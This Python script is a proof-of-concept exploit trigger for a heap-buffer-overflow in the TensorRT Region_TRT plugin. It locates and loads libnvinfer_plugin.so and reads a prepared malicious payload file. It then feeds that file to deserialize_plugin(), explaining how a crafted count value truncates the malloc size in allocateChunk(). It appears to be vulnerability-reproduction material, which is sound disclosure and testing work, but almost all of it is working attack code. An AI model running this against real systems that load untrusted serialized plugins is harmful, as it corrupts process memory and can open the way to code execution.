| |
| """ |
| Trigger TensorRT Region plugin heap overflow via deserialize_plugin(). |
| |
| This script loads a malicious serialized payload and feeds it to |
| RegionPluginCreator.deserialize_plugin(), which internally calls |
| Region::Region(buffer, length) — the vulnerable deserialization constructor. |
| |
| Requirements: |
| - TensorRT Python package (pip install tensorrt) |
| - TensorRT OSS plugin library (libnvinfer_plugin.so) built from source |
| https://github.com/NVIDIA/TensorRT |
| |
| For ASan detection, build the OSS plugins with: |
| cmake .. -DCMAKE_CXX_FLAGS="-fsanitize=address" |
| make -j$(nproc) nvinfer_plugin |
| |
| Usage: |
| python3 gen_payload.py # generates malicious_region_payload.bin |
| python3 trigger_deserialize.py # triggers the heap overflow |
| """ |
| import ctypes |
| import struct |
| import sys |
| import os |
| import glob |
|
|
def find_and_load_plugin_lib():
    """Locate libnvinfer_plugin.so and return its path, or None if not found.

    Despite its name, this function does NOT load the library; the caller is
    expected to hand the returned path to ``ctypes.CDLL`` itself.

    Candidates are tried in order, and the first one that exists wins:

    1. A few hard-coded build/install locations. These are passed to
       ``glob.glob`` as patterns, so wildcards may be used in them.
    2. ``<dir>/libnvinfer_plugin.so`` for every non-empty ``<dir>`` in the
       colon-separated ``LD_LIBRARY_PATH`` environment variable. These
       directories are matched literally (see below).

    Returns:
        The first existing candidate path as a string, or ``None``.
    """
    lib_name = "libnvinfer_plugin.so"
    patterns = [
        # TensorRT OSS build output, relative to the current working directory.
        "TensorRT/build/out/libnvinfer_plugin.so",
        "/content/TRT/build/out/libnvinfer_plugin.so",
        # System install location (Debian/Ubuntu multiarch layout).
        "/usr/lib/x86_64-linux-gnu/libnvinfer_plugin.so",
    ]

    # LD_LIBRARY_PATH entries are literal directories, not glob patterns.
    # Escape them so a '[', '*' or '?' in a directory name is matched
    # verbatim instead of being interpreted as a wildcard (which would
    # silently miss the real library or match an unrelated path).
    for directory in os.environ.get("LD_LIBRARY_PATH", "").split(":"):
        if directory:  # skip empty entries produced by '::' or a trailing ':'
            patterns.append(os.path.join(glob.escape(directory), lib_name))

    for pattern in patterns:
        for match in glob.glob(pattern):
            # glob() also reports dangling symlinks; require a real target.
            if os.path.exists(match):
                return match
    return None
|
|
def _print_payload_header(blob):
    """Echo the leading fields of a Region payload blob, if it is long enough.

    Nothing is printed for blobs shorter than 32 bytes. Otherwise:

    * bytes 0-23 are decoded as six little-endian int32 values
      (printed as C, H, W, num, classes, coords);
    * bytes 24 and 25 are printed as the softmaxTree / leaf flag bytes;
    * if at least 36 bytes are present, bytes 32-35 are decoded as a
      little-endian int32. It is printed as ``smTreeTemp->n``, together with
      its low 32 bits and the 32-bit-truncated value of ``n * 4``.
    """
    if len(blob) < 32:
        return
    C, H, W, num, classes, coords = struct.unpack_from("<6i", blob, 0)
    print(f"[*] Payload header: C={C} H={H} W={W} num={num} classes={classes} coords={coords}")
    softmax_tree, leaf = blob[24], blob[25]
    print(f"[*] Flags: softmaxTree={softmax_tree} leaf={leaf}")

    if len(blob) < 36:
        return
    (n_val,) = struct.unpack_from("<i", blob, 32)
    low32 = n_val & 0xFFFFFFFF
    product = n_val * 4
    print(f"[*] smTreeTemp->n = {n_val} (0x{low32:08x})")
    print(f"[*] malloc will compute: {n_val} * 4 = {product} -> 0x{product & 0xFFFFFFFF:08x} (truncated)")


def _find_region_creator(trt):
    """Return the first registered plugin creator named "Region_TRT", or None."""
    registry = trt.get_plugin_registry()
    return next(
        (creator for creator in registry.all_creators if creator.name == "Region_TRT"),
        None,
    )


def main():
    """Feed a serialized Region_TRT payload to the plugin creator's deserializer.

    The payload path is taken from ``sys.argv[1]`` and defaults to
    ``malicious_region_payload.bin``. The process exits with status 1 if:

    * the payload file does not exist;
    * the ``tensorrt`` package cannot be imported; or
    * no ``Region_TRT`` creator is present in the plugin registry.

    Any exception raised by ``deserialize_plugin`` (or by the status prints
    that follow it) is caught and reported instead of propagating.
    """
    payload_file = sys.argv[1] if len(sys.argv) > 1 else "malicious_region_payload.bin"

    if not os.path.exists(payload_file):
        print(f"[-] {payload_file} not found. Run gen_payload.py first.")
        sys.exit(1)
    with open(payload_file, "rb") as fh:
        payload = fh.read()
    print(f"[+] Loaded {payload_file}: {len(payload)} bytes")

    # tensorrt is imported lazily so a missing package yields a friendly
    # message instead of a traceback.
    try:
        import tensorrt as trt
        print(f"[+] TensorRT {trt.__version__}")
    except ImportError:
        print("[-] TensorRT Python package not found. Install with: pip install tensorrt")
        sys.exit(1)

    plugin_path = find_and_load_plugin_lib()
    if not plugin_path:
        print("[!] OSS plugin library not found, trying default registry...")
    else:
        print(f"[+] Loading plugin lib: {plugin_path}")
        # RTLD_GLOBAL exposes the library's symbols process-wide. The call to
        # initLibNvInferPlugins(NULL logger, "" namespace) is presumably what
        # registers its creators before the registry lookup below.
        oss_lib = ctypes.CDLL(plugin_path, mode=ctypes.RTLD_GLOBAL)
        oss_lib.initLibNvInferPlugins(None, b'')

    region_creator = _find_region_creator(trt)
    if not region_creator:
        for line in (
            "[-] Region_TRT plugin not found in registry.",
            " Build TensorRT OSS plugins first:",
            " git clone https://github.com/NVIDIA/TensorRT.git",
            " cd TensorRT && mkdir build && cd build",
            " cmake .. -DBUILD_PARSERS=OFF -DBUILD_SAMPLES=OFF",
            " make -j$(nproc) nvinfer_plugin",
        ):
            print(line)
        sys.exit(1)

    print(f"[+] Region_TRT v{region_creator.plugin_version}")
    _print_payload_header(payload)

    print()
    for notice in (
        "[!] Calling RegionPluginCreator.deserialize_plugin() with malicious data...",
        "[!] This triggers Region::Region(buffer, length) -> allocateChunk() integer overflow",
        "[!] Expected: heap-buffer-overflow (visible with ASan)",
    ):
        print(notice)
    print()

    try:
        result = region_creator.deserialize_plugin("region", payload)
        print(f"[+] Plugin deserialized (returned: {result})")
        print("[!] Without ASan, the heap overflow is silent but corruption has occurred.")
        print("[!] Build libnvinfer_plugin.so with -fsanitize=address to see the crash.")
    except Exception as exc:
        print(f"[!] Exception during deserialization: {exc}")
|
|
if __name__ == "__main__":
    # Only direct execution fires the trigger; importing this module
    # (e.g. from a test harness) must have no side effects.
    main()
|
|